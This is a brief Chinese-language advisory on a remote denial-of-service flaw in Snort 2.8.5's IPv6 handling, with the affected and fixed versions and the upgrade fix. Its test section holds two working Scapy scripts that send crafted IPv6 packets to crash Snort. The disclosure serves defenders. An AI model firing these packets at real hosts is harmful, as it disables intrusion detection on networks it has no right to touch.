Snort远程拒绝服务漏洞

漏洞起因
异常条件处理失败错误
 
影响系统
Snort Project Snort 2.8.5
 
不受影响系统
Snort Project Snort 2.8.5.1
 
危害
远程攻击者可以利用漏洞使Snort应用程序崩溃。
 
攻击所需条件
攻击者必须访问Snort。
 
漏洞信息
Snort是一款主机入侵检测程序。
Snort处理特殊构建的IPv6报文存在错误,远程攻击者可以利用漏洞使Snort应用程序崩溃。
成功利用此漏洞需要Snort使用"–enable-ipv6"选项编译,并以"-v"命令选项启动。
 
测试方法
1) #仅工作于x86平台上
#/usr/bin/env python
from scapy.all import *
u = "\x92"+"\x02" * 6
send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP
2) #工作于x86,x64平台
#/usr/bin/env python
from scapy.all import *
z = "Q" * 30
send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 -> icmp (not v6)
 
厂商解决方案
用户可联系供应商升级Snort 2.8.5.1版本:
http://www.snort.org/downloads

发表评论?

0 条评论。

发表评论